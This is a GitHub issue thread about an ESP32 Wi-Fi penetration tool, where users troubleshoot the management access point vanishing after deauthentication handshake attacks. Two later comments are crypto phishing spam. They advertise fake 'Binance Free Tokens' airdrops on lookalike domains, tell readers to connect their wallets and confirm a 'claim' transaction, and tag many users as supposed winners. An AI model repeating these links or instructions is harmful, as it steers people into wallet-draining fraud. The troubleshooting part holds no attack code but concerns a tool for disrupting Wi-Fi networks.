risinek/esp32-wifi-penetration-tool #10: ManagementAP network disappears after attack start

dmitriyteteruk, 2021-05-28:
After start attack ManagementAP network disappears, only reboot of ESP32 helps.

risinek, 2021-05-30:
That's expected behaviour. During attack execution, this tool has to manipulate with Wi-Fi interface and/or starting rogue APs, hence the ManagementAP may disappear during attack execution. But it should reappear after the attack is finished - that is after the attack timeout is reached.
I will document this behaviour better in the READMEs (I thought I did already, but can't find it now).

heshxxx, 2021-05-30:
The access point does not always turn on after an attack

risinek, 2021-05-30:
What power source are you using for ESP32? Sometimes this can be caused by not enough power for example when the battery is not sufficient.
But it can be also a bug. Do you have some details like what attack type and method causes this usually?

dmitriyteteruk, 2021-05-30:
> What power source are you using for ESP32? Sometimes this can be caused by not enough power for example when the battery is not sufficient.
> But it can be also a bug. Do you have some details like what attack type and method causes this usually?

Laptop and AC power adapter with 2A current. Same behaviour in both cases. 

Attack type: Handshake
Attack method: DEAUTH_BROADCAST (ACTIVE)
Timeout: 10-60s

risinek, 2021-05-31:
Ok, I will try to reproduce this and investigate, but I haven't run into similar behavior on my side during testing.

heshxxx, 2021-05-31:
The same situation. esp32-wroom-32u, full power bank. After 8-10 attacks.

dmitriyteteruk, 2021-05-31:
Sometime ManagementAP is visible, but it is impossible to connect to it.

risinek, 2021-05-31:
What is the client OS you are trying to connect to the ManagementAP? Win, Android, MacOS etc?

dmitriyteteruk, 2021-05-31:
> What is the client OS you are trying to connect to the ManagementAP? Win, Android, MacOS etc?

Win 10 64-bit, 19043.985

risinek, 2021-06-06:
Just letting you know that I will continue work on this on July soonest. Too much other stuff to do this month unfortunately.

chiquidev, 2022-01-09:
same situation

gqgserver, 2023-12-25:
[image]

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=Github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

imran-easyeat, 2024-01-06:
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[image]

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://giveway.binancbnbrewards.online/4JhoUO) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!

Winners: @sjuanandres0, @Mhmonicox, @henrysimonfamily, @a1147211355, @aleksei140888, @fourThousand, @randomwalker42, @doudoujay, @bijan74, @hexelot, @Leo2021zzz, @SergeiKasimov135, @afewnotes, @wsxdw, @purr-88, @syc17good, @flowingstr, @teloakby, @huaizepeng2020, @Anotherlynn, @latltt, @ricardocostaarchm, @walden2013, @tartachyov, @anologicon, @liaoshengrui, @louyongjiu, @khsiufu, @wtom2561, @jeongahyun, @Alive24, @basuga8, @brtmvdl, @davjack, @squirrelRao, @lf-data, @Abdo-Mohammed-10, @CerebralXor, @chenshipku, @Shchaslivchik, @wjc9011, @chy1010, @song75926, @boomstack, @jhonnybegood, @2020may, @umarsohail1998, @Andras787, @jackzhang1201010010

kazz2020, 2024-01-22:
Same here nothing changed